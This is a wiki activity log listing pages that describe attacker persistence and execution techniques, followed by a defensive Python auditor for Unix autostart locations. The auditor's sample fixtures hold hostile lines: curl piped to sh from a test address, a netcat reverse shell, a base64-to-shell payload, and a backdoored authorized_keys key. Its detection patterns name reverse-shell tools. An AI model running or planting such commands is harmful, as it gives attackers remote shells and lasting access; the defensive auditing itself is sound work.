Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 16:58, 26 January 2023 Ali3nw3rx created page Compromise Client Software Binary (Created page with "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, comp...")
- 16:58, 26 January 2023 Ali3nw3rx created page Browser Extensions (Created page with "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[1][2] Malicious extensions can be installed into a browser through malicious app store downloads masquera...")
- 16:57, 26 January 2023 Ali3nw3rx created page Startup Items (Created page with "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.[1] This is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’...")
- 16:56, 26 January 2023 Ali3nw3rx created page RC Scripts (Created page with "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.[1][2] Upon reboot, the...")
- 16:56, 26 January 2023 Ali3nw3rx created page Network Logon Script (Created page with "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.[1] These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. Adversaries may use these scripts to maintain persistenc...")
- 16:55, 26 January 2023 Ali3nw3rx created page Login Hook (Created page with "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissi...")
- 16:47, 26 January 2023 Ali3nw3rx created page Logon Script (Windows) (Created page with "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[1] This is done via adding a path to a script to the HKCU\Environment\UserInitMprLogonScript Registry key.[2] Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either loc...")
- 16:46, 26 January 2023 Ali3nw3rx created page Category:Boot or Logon Initialization Scripts (Created page with "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configurati...")
- 16:45, 26 January 2023 Ali3nw3rx created page Login Items (Created page with "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.[1] Login items can be added via a shared file list or Service Management Framework.[2] Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSet...")
- 16:44, 26 January 2023 Ali3nw3rx created page Active Setup (Created page with "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.[1] These programs will be executed under the context of the user and will have the account's associated permissions level. Adversaries may abuse Active Setup by creating a key under HKLM\SOF...")
- 16:43, 26 January 2023 Ali3nw3rx created page XDG Autostart Entries (Created page with "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.[1] Wi...")
- 16:43, 26 January 2023 Ali3nw3rx created page Print Processors (Created page with "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternati...")
- 16:42, 26 January 2023 Ali3nw3rx created page Port Monitors (Created page with "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[1] This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[2] Alternatively, an arbitrary DLL can be loaded if permissions a...")
- 16:41, 26 January 2023 Ali3nw3rx created page Shortcut Modification (Created page with "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.[1] Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), ad...")
- 16:40, 26 January 2023 Ali3nw3rx created page LSASS Driver (Created page with "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of...")
- 16:39, 26 January 2023 Ali3nw3rx created page Re-opened Applications (Created page with "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".[1] When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.[2][3] Applications listed in this fil...")
- 16:38, 26 January 2023 Ali3nw3rx created page Kernel Modules and Extensions (Created page with "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.[1] When used maliciously, LKMs can be a type of kernel-mode Rootkit that...")
- 16:35, 26 January 2023 Ali3nw3rx created page Security Support Provider (Created page with "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Pack...")
- 16:35, 26 January 2023 Ali3nw3rx created page Winlogon Helper DLL (Created page with "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalitie...")
- 16:34, 26 January 2023 Ali3nw3rx created page Time Providers (Created page with "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.[1] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.[2] Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Ser...")
- 16:28, 26 January 2023 Ali3nw3rx created page Authentication Package (Created page with "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[1] Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location H...")
- 16:27, 26 January 2023 Ali3nw3rx created page Registry Run Keys / Startup Folder (Created page with "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[1] These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user...")
- 16:26, 26 January 2023 Ali3nw3rx created page Category:Boot or Logon Autostart Execution (Created page with "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[1][2][3][4][5] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configura...")
- 16:25, 26 January 2023 Ali3nw3rx created page BITS Jobs (Created page with "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).[1][2] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks...")
- 16:25, 26 January 2023 Ali3nw3rx created page Device Registration (Created page with "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in ord...")
- 16:24, 26 January 2023 Ali3nw3rx created page SSH Authorized Keys (Created page with "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.[1...")
- 16:23, 26 January 2023 Ali3nw3rx created page Additional Cloud Roles (Created page with "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.[1][2][3][4] With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).[5][4] This accoun...")
- 16:23, 26 January 2023 Ali3nw3rx created page Additional Email Delegate Permissions (Created page with "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.[1][2][3] In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.[4][5] Adversaries may also assign mailbox...")
- 16:22, 26 January 2023 Ali3nw3rx created page Additional Cloud Credentials (Created page with "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.[1][2][3] These credentials include both x509 keys and passwords.[1] With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal...")
- 16:21, 26 January 2023 Ali3nw3rx created page Category:Account Manipulation (Created page with "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or...")
- 16:20, 26 January 2023 Ali3nw3rx created page Category:Persistence (Created page with "The adversary is trying to maintain their foothold. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.")
- 16:14, 26 January 2023 Ali3nw3rx protected Category:Execution [Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite)
- 16:13, 26 January 2023 Ali3nw3rx created page Windows Management Instrumentation (Created page with "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).[1] Remote WMI over DCOM operates using port 135, whereas WMI over W...")
- 16:13, 26 January 2023 Ali3nw3rx created page Malicious Image (Created page with "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing...")
- 16:12, 26 January 2023 Ali3nw3rx created page Malicious File (Created page with "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms...")
- 16:11, 26 January 2023 Ali3nw3rx created page Malicious Link (Created page with "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead u...")
- 16:11, 26 January 2023 Ali3nw3rx created page Category:User Execution (Created page with "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in...")
- 16:10, 26 January 2023 Ali3nw3rx created page Service Execution (Created page with "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[1] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net. PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.[2] Tools...")
- 16:09, 26 January 2023 Ali3nw3rx created page Launchctl (Created page with "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.[1] Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manua...")
- 16:09, 26 January 2023 Ali3nw3rx created page Category:System Services (Created page with "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution. category: execution")
- 16:08, 26 January 2023 Ali3nw3rx deleted page System Services (content was: "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary ex...", and the only contributor was "Ali3nw3rx")
- 16:08, 26 January 2023 Ali3nw3rx created page System Services (Created page with "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution. category: execution")
- 16:07, 26 January 2023 Ali3nw3rx created page Software Deployment Tools (Created page with "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have rem...")
- 16:06, 26 January 2023 Ali3nw3rx created page Shared Modules (Created page with "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.[1] The module loader can load DLLs: via specification of the (fully-qualified or relative)...")
- 16:06, 26 January 2023 Ali3nw3rx created page Serverless Execution (Created page with "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining mal...")
- 16:05, 26 January 2023 Ali3nw3rx created page Container Orchestration Job (Created page with "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster....")
- 16:05, 26 January 2023 Ali3nw3rx created page Systemd Timers (Created page with "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments.[1] Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.[2] Ea...")
- 16:04, 26 January 2023 Ali3nw3rx created page Scheduled Task (Created page with "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, ad...")
- 16:03, 26 January 2023 Ali3nw3rx created page Cron (Created page with "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.[1] The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or...")
- 16:03, 26 January 2023 Ali3nw3rx created page At (Created page with "Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and...")
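Several of the pages logged above (RC Scripts, XDG Autostart Entries, SSH Authorized Keys, Systemd Timers, Cron) describe file-based persistence locations on Unix-like hosts. The following is an added example, not content from the RCATs wiki or from the ATT&CK descriptions it quotes: a small Python auditor that parses those files and reports entries a responder would want to look at. Every file path, file body, key blob and the 203.0.113.x address is constructed for the demonstration; the heuristic pattern list and the "approved key baseline" are assumptions of what counts as suspicious in this example, not a complete detection rule.

```python
"""Audit common Unix persistence locations for suspicious autostart entries.

Added example; the SAMPLES below are constructed and not taken from a real host.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Set

# Heuristics for a startup command (an assumption for this example, not a full rule set).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse-shell primitive"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat spawning a program with -e"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes an embedded base64 payload"),
    (re.compile(r"(^|[\s='\"])/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable directory"),
]

@dataclass(frozen=True)
class Finding:
    source: str   # file the entry came from
    entry: str    # the offending line or command
    reason: str

def check_command(source: str, cmd: str) -> List[Finding]:
    """Return one Finding per heuristic that matches the command string."""
    return [Finding(source, cmd, why) for pat, why in SUSPICIOUS if pat.search(cmd)]

def crontab_commands(text: str) -> Iterator[str]:
    """Yield the command part of each crontab entry (skips comments and VAR=value lines)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):            # @reboot / @hourly ... <command>
            fields = line.split(None, 1)
            cmd = fields[1] if len(fields) == 2 else ""
        else:                               # m h dom mon dow <command>
            fields = line.split(None, 5)
            cmd = fields[5] if len(fields) == 6 else ""
        if cmd:
            yield cmd

def exec_lines(text: str, key: str) -> Iterator[str]:
    """Yield values of key= lines: ExecStart= in a systemd unit, Exec= in a .desktop file."""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(key + "="):
            # drop systemd's ExecStart prefix characters (-, @, :, +, !) before matching
            yield line[len(key) + 1:].lstrip("-@:+!").strip()

def shell_lines(text: str) -> Iterator[str]:
    """Yield the commands in an rc.local-style script (comments, shebang and exit 0 skipped)."""
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and line != "exit 0":
            yield line

KEY_RE = re.compile(r"(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-\S+)\s+(?P<blob>[A-Za-z0-9+/=]+)")

def audit_authorized_keys(source: str, text: str, baseline: Set[str]) -> List[Finding]:
    """Flag keys missing from the approved baseline and keys carrying a forced command."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if not m:
            findings.append(Finding(source, line, "unparseable authorized_keys entry"))
            continue
        if f"{m['type']} {m['blob']}" not in baseline:
            findings.append(Finding(source, line, "key not in approved baseline"))
        if "command=" in line[:m.start()]:          # key options precede the key type
            findings.append(Finding(source, line, "forced command in key options"))
    return findings

def audit(files: Dict[str, str], baseline: Set[str]) -> List[Finding]:
    """Pick a parser for each file by its path and collect all findings."""
    findings: List[Finding] = []
    for path, text in files.items():
        name = path.rsplit("/", 1)[-1]
        if name == "authorized_keys":
            findings += audit_authorized_keys(path, text, baseline)
            continue
        if name.endswith(".service"):
            cmds = exec_lines(text, "ExecStart")
        elif name.endswith(".desktop"):
            cmds = exec_lines(text, "Exec")
        elif name == "rc.local":
            cmds = shell_lines(text)
        elif "cron" in path:
            cmds = crontab_commands(text)
        else:
            continue
        for cmd in cmds:
            findings += check_command(path, cmd)
    return findings

# Constructed sample files; key blobs and the 203.0.113.x (TEST-NET-3) address are fake.
SAMPLES = {
    "/var/spool/cron/crontabs/root": (
        "# m h dom mon dow command\nMAILTO=root\n"
        "0 3 * * * /usr/local/bin/backup.sh\n"
        "@reboot /bin/sh -c 'curl -s http://203.0.113.10/a | sh'\n"
        "*/5 * * * * /dev/shm/.cache/update\n"
    ),
    "/etc/rc.local": "#!/bin/sh -e\n/usr/bin/nc 203.0.113.10 4444 -e /bin/sh &\nexit 0\n",
    "/etc/systemd/system/cache-refresh.service": (
        "[Unit]\nDescription=Cache refresh\n[Service]\n"
        "ExecStart=/bin/sh -c \"echo aWQ= | base64 -d | sh\"\n"
    ),
    "/home/alice/.config/autostart/updater.desktop": (
        "[Desktop Entry]\nType=Application\nName=Updater\nExec=/tmp/.x/agent --daemon\n"
    ),
    "/home/alice/.ssh/authorized_keys": (
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEalice alice@laptop\n"
        'command="/bin/sh -i",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQFAKEinjected\n'
    ),
}
BASELINE = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEalice"}

if __name__ == "__main__":
    for f in audit(SAMPLES, BASELINE):
        print(f"{f.source}: {f.reason}\n    {f.entry}")
```

On a real host the dictionary would be filled from the actual files (per-user crontabs, /etc/cron.d, systemd unit directories, /etc/xdg/autostart and ~/.config/autostart, each user's .ssh/authorized_keys) and the baseline from the keys the organisation actually issued. The pattern list only catches obvious cases; the durable signal is the diff between the current contents of these locations and a known-good snapshot, which is why the authorized_keys check is baseline-driven rather than pattern-driven. The Windows entries on this page (Run keys, UserInitMprLogonScript, Active Setup, Winlogon helpers, SSPs, time providers, print processors) live in the registry and call for a separate PowerShell auditor rather than this file parser.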